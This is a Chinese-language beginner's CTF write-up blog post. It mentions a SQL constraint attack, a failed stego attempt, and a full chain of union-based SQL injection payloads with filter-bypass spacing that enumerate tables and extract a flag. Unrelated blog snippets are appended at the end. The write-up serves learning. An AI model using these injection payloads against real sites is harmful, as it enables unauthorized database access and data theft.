第一次做題,知道差距在哪了,被打的落花流水,片甲不留,總之非常失敗吧,只做題不整理的都是耍流氓,改變耍流氓。
這道題考察的是sql約束攻擊,在bugku中遇到過,當時做的時候沒想到,知識還是不夠全面。
這個部落格講的比較詳細,其中也有bugku中的題目
sql約束攻擊總結
開啟看到有16張,我就聯想到了雜項,果然太菜,然後乙個個儲存,用binwalk分析,啥都沒有,然後還用了stegsolve,毛都沒有。。。然後我看了看源**,題目突破口被我完美錯過,看了一點感覺都沒有,還是菜,害!
name傳的值是/etc目錄,之前完全沒接觸。。奇怪的知識+1。/etc目錄詳解
/代替空格,也可以用()。
放上師傅的語句
?id=1//%26//1
?id=1//%26//0
?id=1//group//by//6
?id=-1//union//select//1,database(),3,4,5,6,7
?id=-2//union//select//1,group_concat(table_name),3,4,5,6,7//from//information_schema.tables//where//!(table_schema<>「web」)
?id=-2//union//select//1,group_concat(column_name),3,4,5,6,7//from//information_schema.columns//where//!(table_name<>「flag」)
?id=-2//union//select//1,flag,3,4,5,6,7//from//flag
得到flag
用github上的指令碼跑一下,但是python沒有cv2模組,跑不出來,整了一下午也沒搞好,搞好再試吧。
記錄一下第一次寫部落格
目的 從畢業到現在2年多,好像沒有什麼自己的底蘊,不止一次懷疑自己是不是真的適合程式設計師這條路又找不到適合自己的,但回頭望望仔細一想,好像也會那麼一點點。身邊的程式設計師們好像都有自己的部落格,他們善於總結,善於對新的技術歸納整理成文,而我好像卻沒有這麼樣能力,所以有這個部落格的目的就是把自己平常...
第一次考核整理
t1斐波那契數列,規則 1,1,2,3,5,8,13,21 輸出前20個數字。並輸出前20的和 python 實現 def fibonacci n if n 1 return 1 elif n 2 return 1 else return fibonacci n 1 fibonacci n 2 nu...
碎碎念 記錄一下第一次開通部落格的心情
這是讀大學的第三年了,也是我學習軟體工程這個專業的第三年。感覺自己在這三年裡勉勉強強步入了計算機相關專業的那個小門檻兒,可大概是覺得自己學藝不精,還有很多很多的知識需要我慢慢去學習。老師說學程式設計是乙個很艱辛的過程,為什麼呢,程式設計首先需要學習不同於以往的計算機語言,而重新學習一門語言,從入門到...